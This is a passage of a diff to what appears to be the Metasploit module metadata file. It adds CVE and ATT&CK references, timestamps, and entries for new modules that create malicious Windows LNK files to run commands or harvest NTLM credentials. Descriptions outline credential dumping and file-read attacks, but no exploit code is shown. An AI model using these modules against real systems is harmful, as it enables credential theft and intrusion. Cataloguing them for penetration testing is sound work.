+      "CVE-1999-0920",
      "OSVDB-368",
      "BID-1484"
    ],
@@ -9804,7 +9814,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-21 08:32:40 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/admin/pop2/uw_fileretrieval.rb",
    "is_install_path": true,
    "ref_name": "admin/pop2/uw_fileretrieval",
@@ -11234,7 +11244,8 @@
    "description": "This module authenticates to an Active Directory Domain Controller and creates\n          a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the\n          ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM\n          hive copy can be used in combination with other tools for offline extraction of AD\n          password hashes. All of this is done without uploading a single binary to the\n          target host.",
    "references": [
      "URL-http://sourceforge.net/projects/smbexec",
-      "URL-https://www.optiv.com/blog/owning-computers-without-shell-access"
+      "URL-https://www.optiv.com/blog/owning-computers-without-shell-access",
+      "ATT&CK-T1003.003"
    ],
    "platform": "",
    "arch": "",
@@ -11248,7 +11259,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2025-05-21 08:32:40 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/psexec_ntdsgrab",
@@ -15617,6 +15628,7 @@
    ],
    "description": "This module exploits a Denial of Service vulnerability in npm module \"ws\".\n        By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.",
    "references": [
+      "CVE-2016-10542",
      "URL-https://nodesecurity.io/advisories/550",
      "CWE-400"
    ],
@@ -15626,7 +15638,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-09 00:08:33 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/dos/http/ws_dos.rb",
    "is_install_path": true,
    "ref_name": "dos/http/ws_dos",
@@ -15830,6 +15842,7 @@
    ],
    "description": "This module exploits a denial of service condition present in IBM Tivoli Storage Manager\n          FastBack Server when dealing with packets triggering the opcode 0x534 handler.",
    "references": [
+      "CVE-2015-1930",
      "EDB-38979",
      "OSVDB-132307"
    ],
@@ -15839,7 +15852,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-15 08:43:24 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/dos/misc/ibm_tsm_dos.rb",
    "is_install_path": true,
    "ref_name": "dos/misc/ibm_tsm_dos",
@@ -17224,6 +17237,7 @@
    ],
    "description": "This module will send a format string as USER to Solar FTP, causing a\n          READ violation in function \"__output_1()\" found in \"sfsservice.exe\"\n          while trying to calculate the length of the string. This vulnerability\n          affects versions 2.1.1 and earlier.",
    "references": [
+      "CVE-2011-10029",
      "EDB-16204"
    ],
    "platform": "",
@@ -17232,7 +17246,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-13 23:28:13 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/dos/windows/ftp/solarftp_user.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/ftp/solarftp_user",
@@ -17487,14 +17501,16 @@
      "Sil3nt_Dre4m"
    ],
    "description": "The Kaillera 0.86 server can be shut down by sending any malformed packet\n          after the initial \"hello\" packet.",
-    "references": [],
+    "references": [
+      "CVE-2011-10020"
+    ],
    "platform": "",
    "arch": "",
    "rport": 27888,
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-13 23:28:13 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/dos/windows/games/kaillera.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/games/kaillera",
@@ -18363,6 +18379,7 @@
    ],
    "description": "This module sends a specially-crafted SSH Key Exchange causing the service to\n          crash.",
    "references": [
+      "CVE-2013-10065",
      "OSVDB-92081",
      "URL-https://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html"
    ],
@@ -18372,7 +18389,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-13 23:28:13 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/ssh/sysax_sshd_kexchange",
@@ -18677,6 +18694,130 @@
    "needs_cleanup": false,
    "actions": []
  },
+  "auxiliary_fileformat/datablock_padding_lnk": {
+    "name": "Windows Shortcut (LNK) Padding",
+    "fullname": "auxiliary/fileformat/datablock_padding_lnk",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2025-07-19",
+    "type": "auxiliary",
+    "author": [
+      "Nafiez"
+    ],
+    "description": "This module generates Windows LNK (shortcut) file that can execute\n          arbitrary commands. The LNK file uses environment variables and execute\n          its arguments from COMMAND_LINE_ARGUMENTS with extra juicy whitespace\n          character padding bytes and concatenates the actual payload.",
+    "references": [
+      "ZDI-25-148",
+      "URL-https://zeifan.my/Windows-LNK/",
+      "URL-https://gist.github.com/nafiez/1236cc4c808a489e60e2927e0407c8d1",
+      "URL-https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": null,
+    "mod_time": "2025-09-29 10:12:50 +0000",
+    "path": "/modules/auxiliary/fileformat/datablock_padding_lnk.rb",
+    "is_install_path": true,
+    "ref_name": "fileformat/datablock_padding_lnk",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
+  "auxiliary_fileformat/environment_variable_datablock_leak": {
+    "name": "Right-Click Execution - Windows LNK File Special UNC Path NTLM Leak",
+    "fullname": "auxiliary/fileformat/environment_variable_datablock_leak",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2025-05-06",
+    "type": "auxiliary",
+    "author": [
+      "Nafiez"
+    ],
+    "description": "This module creates a malicious Windows shortcut (LNK) file that\n          specifies a special UNC path in EnvironmentVariableDataBlock of Shell Link (.LNK)\n          that can trigger an authentication attempt to a remote server. This can be used\n          to harvest NTLM authentication credentials.\n\n          When a victim right-click the generated LNK file, it will attempt to connect to the\n          the specified UNC path, resulting in an SMB connection that can be captured\n          to harvest credentials.",
+    "references": [
+      "URL-https://zeifan.my/Right-Click-LNK/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": null,
+    "mod_time": "2025-09-29 11:37:42 +0000",
+    "path": "/modules/auxiliary/fileformat/environment_variable_datablock_leak.rb",
+    "is_install_path": true,
+    "ref_name": "fileformat/environment_variable_datablock_leak",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "screen-effects"
+      ],
+      "Reliability": []
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
+  "auxiliary_fileformat/icon_environment_datablock_leak": {
+    "name": "IconEnvironmentDataBlock - Windows LNK File Special UNC Path NTLM Leak",
+    "fullname": "auxiliary/fileformat/icon_environment_datablock_leak",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2025-05-16",
+    "type": "auxiliary",
+    "author": [
+      "Nafiez"
+    ],
+    "description": "This module creates a malicious Windows shortcut (LNK) file that\n          specifies a special UNC path in IconEnvironmentDataBlock of Shell Link (.LNK)\n          that can trigger an authentication attempt to a remote server. This can be used\n          to harvest NTLM authentication credentials.\n\n          When a victim browse to the location of the LNK file, it will attempt to\n          connect to the the specified UNC path, resulting in an SMB connection that\n          can be captured to harvest credentials.",
+    "references": [
+      "URL-https://zeifan.my/Right-Click-LNK/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": null,
+    "mod_time": "2025-09-29 11:37:42 +0000",
+    "path": "/modules/auxiliary/fileformat/icon_environment_datablock_leak.rb",
+    "is_install_path": true,
+    "ref_name": "fileformat/icon_environment_datablock_leak",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ],
+      "Reliability": []
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
  "auxiliary_fileformat/maldoc_in_pdf_polyglot": {
    "name": "Maldoc in PDF Polyglot converter",
    "fullname": "auxiliary/fileformat/maldoc_in_pdf_polyglot",
@@ -18798,6 +18939,44 @@
    "needs_cleanup": false,
    "actions": []
  },
+  "auxiliary_fileformat/specialfolder_leak": {
+    "name": "SpecialFolderDatablock - Windows LNK File Special UNC Path NTLM Leak",
+    "fullname": "auxiliary/fileformat/specialfolder_leak",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2025-05-10",
+    "type": "auxiliary",
+    "author": [
+      "Nafiez"
+    ],
+    "description": "This module creates a malicious Windows shortcut (LNK) file that\n          specifies a special UNC path in SpecialFolderDatablock of Shell Link (.LNK)\n          that can trigger an authentication attempt to a remote server. This can be used\n          to harvest NTLM authentication credentials.\n\n          When a victim browse to the location of the LNK file, it will attempt to\n          connect to the the specified UNC path, resulting in an SMB connection that\n          can be captured to harvest credentials.",
+    "references": [],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": null,
+    "mod_time": "2025-09-29 11:33:33 +0000",
+    "path": "/modules/auxiliary/fileformat/specialfolder_leak.rb",
+    "is_install_path": true,
+    "ref_name": "fileformat/specialfolder_leak",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
  "auxiliary_fileformat/word_unc_injector": {
    "name": "Microsoft Word UNC Path Injector",
    "fullname": "auxiliary/fileformat/word_unc_injector",
@@ -19863,6 +20042,7 @@
    ],
    "description": "AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG\n          generation PHP file. This module exploits this to read an arbitrary file from\n          the file system. Any authenticated user is able to exploit it, as administrator\n          privileges aren't required.",
    "references": [
+      "CVE-2013-5967",
      "EDB-32644"
    ],
    "platform": "Linux",
@@ -19884,7 +20064,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/gather/alienvault_iso27001_sqli.rb",
    "is_install_path": true,
    "ref_name": "gather/alienvault_iso27001_sqli",
@@ -20124,6 +20304,7 @@
    ],
    "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n          all versions of Android's open source stock browser before 4.4, and Android apps running\n          on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n          to scrape both cookie data and page contents from a vulnerable browser window.\n\n          Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n          Some sample UXSS scripts are provided in data/exploits/uxss.",
    "references": [
+      "CVE-2014-6041",
      "URL-http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html",
      "URL-https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef",
      "URL-http://trac.webkit.org/changeset/96826/webkit"
@@ -20134,7 +20315,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/gather/android_object_tag_webview_uxss.rb",
    "is_install_path": true,
    "ref_name": "gather/android_object_tag_webview_uxss",
@@ -20932,9 +21113,11 @@
    ],
    "description": "This module leverages an unauthenticated arbitrary root file read vulnerability for\n          Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades\n          are enabled on affected devices, traversal payloads can be used to read any files on\n          the local file system. Password hashes read from disk may be cracked, potentially\n          resulting in administrator-level access to the target device. This vulnerability is\n          tracked as CVE-2024-24919.",
    "references": [
+      "CVE-2024-24919",
      "URL-https://support.checkpoint.com/results/sk/sk182336",
      "URL-https://www.rapid7.com/blog/post/2024/05/30/etr-cve-2024-24919-check-point-security-gateway-information-disclosure/",
-      "URL-https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/"
+      "URL-https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/",
+      "ATT&CK-T1003.008"
    ],
    "platform": "",
    "arch": "",
@@ -20955,7 +21138,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-06-13 08:14:35 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.rb",
    "is_install_path": true,
    "ref_name": "gather/checkpoint_gateway_fileread_cve_2024_24919",
@@ -22605,7 +22788,8 @@
      "EDB-47288",
      "URL-https://www.fortiguard.com/psirt/FG-IR-18-384",
      "URL-https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf",
-      "URL-https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/"
+      "URL-https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/",
+      "ATT&CK-T1003.008"
    ],
    "platform": "",
    "arch": "",
@@ -22626,7 +22810,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-04-16 06:52:59 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/auxiliary/gather/fortios_vpnssl_traversal_creds_leak.rb",
    "is_install_path": true,
    "ref_name": "gather/fortios_vpnssl_traversal_creds_leak",
@@ -23618,6 +23802,7 @@
    ],
    "description": "The Jasmin Ransomware web server contains an unauthenticated SQL injection vulnerability\n          within the login functionality. As of April 15, 2024 this was still unpatched, so all\n          versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.\n\n          Retrieving the victim's data may take a long amount of time. It is much quicker to\n          get the logins, then just login to the site.",
    "references": [
+      "CVE-2025-6095",
      "URL-https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc",
      "URL-https://github.com/codesiddhant/Jasmin-Ransomware"
    ],
@@ -23640,7 +23825,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-05-04 16:06:48 +0000",
+    "mod_time": "2025-10-07 14:03:32 +0000",
    "path": "/modules/auxiliary/gather/jasmin_ransomware_sqli.rb",
    "is_install_path": true,
    "ref_name": "gather/jasmin_ransomware_sqli",
@@ -24001,6 +24186,7 @@
    ],
    "description": "Joomla versions 3.2.2 and below are vulnerable to an unauthenticated SQL injection\n          which allows an attacker to access the database or read arbitrary files as the\n          'mysql' user. This module will only work if the mysql user Joomla is using\n          to access the database has the LOAD_FILE permission.",
    "references": [
+      "CVE-2014-7981",
      "EDB-31459",
      "URL-http://web.archive.org/web/20221129082328/https://developer.joomla.org/security/578-20140301-core-sql-injection.html"
    ],
@@ -24023,7 +24209,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/gather/joomla_weblinks_sqli.rb",
    "is_install_path": true,
    "ref_name": "gather/joomla_weblinks_sqli",
@@ -24275,7 +24461,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-08-15 15:34:13 +0000",
+    "mod_time": "2025-10-23 14:41:18 +0000",
    "path": "/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_esc_vulnerable_cert_finder",
@@ -24319,7 +24505,8 @@
    "description": "This module will gather passwords and password hashes from a target LDAP server via multiple techniques\n          including Windows LAPS. For best results, run with SSL because some attributes are only readable over\n          encrypted connections.",
    "references": [
      "URL-https://blog.xpnsec.com/lapsv2-internals/",
-      "URL-https://github.com/fortra/impacket/blob/master/examples/GetLAPSPassword.py"
+      "URL-https://github.com/fortra/impacket/blob/master/examples/GetLAPSPassword.py",
+      "ATT&CK-T1003"
    ],
    "platform": "",
    "arch": "",
@@ -24327,7 +24514,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-07-18 17:10:35 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/auxiliary/gather/ldap_passwords.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_passwords",
@@ -24529,6 +24716,60 @@
      }
    ]
  },
+  "auxiliary_gather/listmonk_env_disclosure": {
+    "name": "Listmonk Insecure Sprig Template Functions Environment Disclosure",
+    "fullname": "auxiliary/gather/listmonk_env_disclosure",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2025-06-08",
+    "type": "auxiliary",
+    "author": [
+      "Tarek Nakkouch"
+    ],
+    "description": "This module exploits insecure Sprig template functions in Listmonk\n          versions prior to v5.0.2. The env and expandenv functions are enabled\n          by default, allowing authenticated users with campaign permissions to\n          extract sensitive environment variables via campaign preview.",
+    "references": [
+      "CVE-2025-49136",
+      "URL-https://github.com/knadh/listmonk/security/advisories/GHSA-jc7g-x28f-3v3h"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 9000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2025-10-08 21:02:24 +0000",
+    "path": "/modules/auxiliary/gather/listmonk_env_disclosure.rb",
+    "is_install_path": true,
+    "ref_name": "gather/listmonk_env_disclosure",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": []
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
  "auxiliary_gather/magento_xxe_cve_2024_34102": {
    "name": "Magento XXE Unserialize Arbitrary File Read",
    "fullname": "auxiliary/gather/magento_xxe_cve_2024_34102",
@@ -24820,6 +25061,7 @@
    ],
    "description": "Microweber CMS v1.2.10 has a backup functionality. Upload and download endpoints can be combined to read any file from the filesystem.\n          Upload function may delete the local file if the web service user has access.",
    "references": [
+      "CVE-2025-34076",
      "URL-https://huntr.dev/bounties/09218d3f-1f6a-48ae-981c-85e86ad5ed8b/"
    ],
    "platform": "",
@@ -24841,7 +25083,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-02-22 14:21:33 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/gather/microweber_lfi.rb",
    "is_install_path": true,
    "ref_name": "gather/microweber_lfi",
@@ -26221,7 +26463,8 @@
    "description": "This module exploits combined heap and stack buffer overflows for QNAP\n          NAS and NVR devices to dump the admin (root) shadow hash from memory via\n          an overwrite of __libc_argv[0] in the HTTP-header-bound glibc backtrace.\n\n          A binary search is performed to find the correct offset for the BOFs.\n          Since the server forks, blind remote exploitation is possible, provided\n          the heap does not have ASLR.",
    "references": [
      "URL-https://seclists.org/fulldisclosure/2017/Feb/2",
-      "URL-https://en.wikipedia.org/wiki/Binary_search_algorithm"
+      "URL-https://en.wikipedia.org/wiki/Binary_search_algorithm",
+      "ATT&CK-T1003"
    ],
    "platform": "",
    "arch": "",
@@ -26242,7 +26485,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb",
    "is_install_path": true,
    "ref_name": "gather/qnap_backtrace_admin_hash",
@@ -26296,7 +26539,8 @@
      "EDB-48531",
      "URL-https://infosecwriteups.com/qnap-pre-auth-root-rce-affecting-450k-devices-on-the-internet-d55488d28a05",
      "URL-https://www.qnap.com/en-us/security-advisory/nas-201911-25",
-      "URL-https://github.com/Imanfeng/QNAP-NAS-RCE"
+      "URL-https://github.com/Imanfeng/QNAP-NAS-RCE",
+      "ATT&CK-T1003.008"
    ],
    "platform": "",
    "arch": "",
@@ -26317,7 +26561,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-02-23 16:27:12 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/auxiliary/gather/qnap_lfi.rb",
    "is_install_path": true,
    "ref_name": "gather/qnap_lfi",
@@ -27383,6 +27627,7 @@
    ],
    "description": "This module exploits an authenticated SQL injection in SuiteCRM in versions before 7.12.6. The vulnerability\n          allows an authenticated attacker to send specially crafted requests to the export entry point of the application in order\n          to retrieve all the usernames and their associated password from the database.",
    "references": [
+      "CVE-2023-5350",
      "URL-https://blog.exodusintel.com/2022/06/09/salesagility-suitecrm-export-request-sql-injection-vulnerability/",
      "URL-https://docs.suitecrm.com/admin/releases/7.12.x/#_7_12_6"
    ],
@@ -27405,7 +27650,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/gather/suite_crm_export_sqli.rb",
    "is_install_path": true,
    "ref_name": "gather/suite_crm_export_sqli",
@@ -27814,7 +28059,8 @@
    "description": "This module uses an anonymous-bind LDAP connection to dump data from\n          the vmdir service in VMware vCenter Server version 6.7 prior to the\n          6.7U3f update, only if upgraded from a previous release line, such as\n          6.0 or 6.5.\n          If the bind username and password are provided (BIND_DN and LDAPPassword\n          options), these credentials will be used instead of attempting an\n          anonymous bind.",
    "references": [
      "CVE-2020-3952",
-      "URL-https://www.vmware.com/security/advisories/VMSA-2020-0006.html"
+      "URL-https://www.vmware.com/security/advisories/VMSA-2020-0006.html",
+      "ATT&CK-T1003"
    ],
    "platform": "",
    "arch": "",
@@ -27822,7 +28068,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-06-05 16:33:42 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb",
    "is_install_path": true,
    "ref_name": "gather/vmware_vcenter_vmdir_ldap",
@@ -27913,7 +28159,11 @@
    ],
    "description": "Dumps SAM hashes and LSA secrets (including cached creds) from the\n          remote Windows target without executing any agent locally. This is\n          done by remotely updating the registry key security descriptor,\n          taking advantage of the WriteDACL privileges held by local\n          administrators to set temporary read permissions.\n\n          This can be disabled by setting the `INLINE` option to false and the\n          module will fallback to the original implementation, which consists\n          in saving the registry hives locally on the target\n          (%SYSTEMROOT%\\Temp\\<random>.tmp), downloading the temporary hive\n          files and reading the data from it. This temporary files are removed\n          when it's done.\n\n          On domain controllers, secrets from Active Directory is extracted\n          using [MS-DRDS] DRSGetNCChanges(), replicating the attributes we need\n          to get SIDs, NTLM hashes, groups, password history, Kerberos keys and\n          other interesting data. Note that the actual `NTDS.dit` file is not\n          downloaded. Instead, the Directory Replication Service directly asks\n          Active Directory through RPC requests.\n\n          This modules takes care of starting or enabling the Remote Registry\n          service if needed. It will restore the service to its original state\n          when it's done.\n\n          This is a port of the great Impacket `secretsdump.py` code written by\n          Alberto Solino.",
    "references": [
-      "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py"
+      "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py",
+      "ATT&CK-T1003.002",
+      "ATT&CK-T1003.004",
+      "ATT&CK-T1003.005",
+      "ATT&CK-T1003.006"
    ],
    "platform": "",
    "arch": "",
@@ -27927,7 +28177,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2025-05-21 11:40:06 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
    "is_install_path": true,
    "ref_name": "gather/windows_secrets_dump",
@@ -28362,6 +28612,7 @@
    ],
    "description": "This module exploits a directory traversal bug in XBMC 11, up until the\n          2012-11-04 nightly build. The module can only be used to retrieve files.",
    "references": [
+      "CVE-2012-10024",
      "URL-https://forum.kodi.tv/showthread.php?tid=144110&pid=1227348",
      "URL-https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335",
      "URL-https://ioactive.com/pdfs/Security_Advisory_XBMC.pdf"
@@ -28385,7 +28636,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/gather/xbmc_traversal.rb",
    "is_install_path": true,
    "ref_name": "gather/xbmc_traversal",
@@ -30257,6 +30508,7 @@
    ],
    "description": "This module exploits a directory traversal vulnerability found in ColoradoFTP server\n          version <= 1.3 Build 8. This vulnerability allows an attacker to download and upload arbitrary files\n          from the server GET/PUT command including file system traversal strings starting with '\\'.\n          The server is written in Java and therefore platform independent, however this vulnerability is only\n          exploitable on the Windows version.",
    "references": [
+      "CVE-2025-34110",
      "EDB-40231",
      "URL-https://bitbucket.org/nolife/coloradoftp/commits/16a60c4a74ef477cd8c16ca82442eaab2fbe8c86",
      "URL-https://bugtraq.securityfocus.com/archive/1/539186"
@@ -30272,7 +30524,7 @@
      "ftp"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/ftp/colorado_ftp_traversal",
@@ -30663,6 +30915,7 @@
    ],
    "description": "This module exploits a directory traversal flaw found in A10 Networks\n          (Soft) AX Loadbalancer version 2.6.1-GR1-P5/2.7.0 or less.  When\n          handling a file download request, the xml/downloads class fails to\n          properly check the 'filename' parameter, which can be abused to read\n          any file outside the virtual directory. Important files include SSL\n          certificates. This module works on both the hardware devices and the\n          Virtual Machine appliances. IMPORTANT NOTE: This module will also delete the\n          file on the device after downloading it. Because of this, the CONFIRM_DELETE\n          option must be set to 'true' either manually or by script.",
    "references": [
+      "CVE-2014-125125",
      "OSVDB-102657",
      "BID-65206",
      "EDB-31261"
@@ -30686,7 +30939,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/a10networks_ax_directory_traversal",
@@ -30997,6 +31250,7 @@
    ],
    "description": "This module exploits a directory traversal vulnerability in Apache ActiveMQ\n          5.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty's\n          ResourceHandler installed with the affected versions. This module has been tested\n          successfully on ActiveMQ 5.3.1 and 5.3.2 over Windows 2003 SP2.",
    "references": [
+      "CVE-2010-1587",
      "OSVDB-86401",
      "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=895",
      "URL-https://issues.apache.org/jira/browse/amq-2788"
@@ -31020,7 +31274,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/apache_activemq_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/apache_activemq_traversal",
@@ -31756,6 +32010,7 @@
    ],
    "description": "This module exploits a directory traversal vulnerability present in\n        several Barracuda products, including the Barracuda Spam and Virus Firewall,\n        Barracuda SSL VPN, and the Barracuda Web Application Firewall. By default,\n        this module will attempt to download the Barracuda configuration file.",
    "references": [
+      "CVE-2010-20109",
      "OSVDB-68301",
      "URL-https://web.archive.org/web/20101004131244/http://secunia.com/advisories/41609/",
      "EDB-15130"
@@ -31779,7 +32034,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-20 13:20:44 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/barracuda_directory_traversal",
@@ -33360,6 +33615,7 @@
    ],
    "description": "This module exploits a directory traversal flaw found in Clansphere 2011.3.\n          The application fails to handle the cs_lang parameter properly, which can be\n          used to read any file outside the virtual directory.",
    "references": [
+      "CVE-2012-10034",
      "OSVDB-86720",
      "EDB-22181"
    ],
@@ -33382,7 +33638,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/clansphere_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/clansphere_traversal",
@@ -33757,6 +34013,7 @@
    ],
